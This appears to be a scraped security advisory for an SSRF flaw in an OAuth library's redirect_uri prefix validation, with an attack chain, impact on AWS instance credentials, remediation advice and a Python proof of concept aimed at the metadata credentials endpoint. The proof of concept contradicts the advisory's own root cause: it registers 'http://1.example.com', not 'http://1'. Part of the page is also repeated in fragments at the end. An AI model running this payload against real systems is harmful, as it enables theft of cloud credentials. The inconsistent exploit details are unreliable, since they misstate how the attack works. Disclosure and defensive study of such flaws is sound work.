CVE-2026-7741

SSRF via Misconfigured OAuth Callback

AuthLib v2.1.0–2.4.2

A Server-Side Request Forgery vulnerability in the OAuth callback handler allows attackers to redirect callbacks to internal network endpoints.

Vulnerability Summary

CVE: CVE-2026-7741 CVSS: 8.1 (High) CWE: CWE-918 (Server-Side Request Forgery)

AuthLib versions 2.1.0 through 2.4.2 do not validate that the redirect_uri parameter in OAuth callback processing points to a registered, allowlisted domain. An attacker can supply an internal network address (including cloud metadata endpoints) as the redirect target.

Technical Details

Root Cause

The process_callback() function in authlib/oauth2/server.py validates the redirect_uri against a list of registered URIs using a simple prefix match. The validation accepts any URI that starts with the registered domain — including http://169.254.169.254/ when the attacker registers a URI of http://1 (numeric prefix of the metadata address).

Attack Chain

Register a client application with redirect_uri = "http://1"
Initiate an OAuth flow with redirect_uri=http://169.254.169.254/latest/meta-data/
The prefix check passes (starts with "http://1")
The server fetches the URL server-side and includes the response in the error message

Impact

On AWS EC2 instances:

Retrieval of IMDSv1 instance credential IAM role names and temporary credentials
Access to user-data scripts that may contain hardcoded secrets
Full AS boundary crossing — from public internet to internal AWS environment

Proof of Concept

import requests

# Step 1: Register app with permissive redirect_uri
register_response = requests.post("https://auth.target.com/oauth/register", json={
    "redirect_uris": ["http://1.example.com"],
    "name": "test"
})
client_id = register_response.json()["client_id"]

# Step 2: Trigger SSRF via callback
requests.get(f"https://auth.target.com/oauth/authorize", params={
    "client_id": client_id,
    "redirect_uri": "http://169.254.169.254/latest/meta-data/iam/security-credentials/",
    "response_type": "code"
})

Remediation

Implement exact-match validation for redirect_uri (not prefix matching)
Maintain a strict allowlist of permitted redirect domains
Block SSRF at the network level — disallow outbound requests from auth services to internal address ranges

ssrfoauthhighcloud-metadata

Related Intelligence

Further exploration based on cross-referenced content.

tools

Auth Bypass Kit

Collection of authentication bypass techniques packaged as a CLI — JWT attacks, OAuth flaws, SAML misconfigurations, and session fixation.

February 15, 2026

tools

SSRF Probe

Automated Server-Side Request Forgery detection and exploitation tool with cloud metadata endpoint testing built-in.

February 1, 2026

research

JWT Algorithm Confusion in FastAPI-Security

A vulnerability in JWT validation logic allows attackers to bypass signature verification by switching algorithm from RS256 to HS256.

January 19, 2026

Vulnerability Summary

CVE: CVE-2026-7741 CVSS: 8.1 (High) CWE: CWE-918 (Server-Side Request Forgery)

Technical Details

Root Cause

Attack Chain

Initiate an OAuth flow with redirect_uri=http://169.254.169.254/latest/meta-data/

The prefix check passes (starts with "http://1")

The server fetches the URL server-side and includes the response in the error message

Impact

On AWS EC2 instances:

Retrieval of IMDSv1 instance credential IAM role names and temporary credentials

Access to user-data scripts that may contain hardcoded secrets

Full AS boundary crossing — from public internet to internal AWS environment

Proof of Concept

import requests # Step 1: Register app with permissive redirect_uri register_response = requests.post("https://auth.target.com/oauth/register", json={ "redirect_uris": ["http://1.example.com"], "name": "test" }) client_id = register_response.json()["client_id"] # Step 2: Trigger SSRF via callback requests.get(f"https://auth.target.com/oauth/authorize", params={ "client_id": client_id, "redirect_uri": "http://169.254.169.254/latest/meta-data/iam/security-credentials/", "response_type": "code" })